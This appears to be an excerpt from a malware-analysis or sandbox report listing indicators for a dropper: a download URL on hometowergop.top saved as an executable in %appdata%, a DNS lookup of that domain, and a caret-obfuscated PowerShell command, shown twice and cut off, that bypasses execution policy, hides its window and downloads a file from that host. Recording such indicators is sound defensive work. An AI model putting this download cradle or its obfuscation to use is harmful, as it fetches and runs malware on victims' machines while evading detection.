Technical Information
- http://hometowergop.top/read.php?f=0.dat as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "Powe^RSH^EL^L.Ex^E^ -^E^X^E^cu^TI^O^nPoLI^cY bYpa^s^S -no^p^Ro^FIL^E ^-WI^nD^ow^sTyLE^ ^HiD^DEN (new-Ob^J^e^c^t ^SysT^Em^.neT.wE^BcL^IENt)^.DownLoaDfIlE('http://hometowergop....
- DNS ASK ho####wergop.top
- '<SYSTEM32>\cmd.exe' /C "Powe^RSH^EL^L.Ex^E^ -^E^X^E^cu^TI^O^nPoLI^cY bYpa^s^S -no^p^Ro^FIL^E ^-WI^nD^ow^sTyLE^ ^HiD^DEN (new-Ob^J^e^c^t ^SysT^Em^.neT.wE^BcL^IENt)^.DownLoaDfIlE('http://hometowergop....' (with hidden window)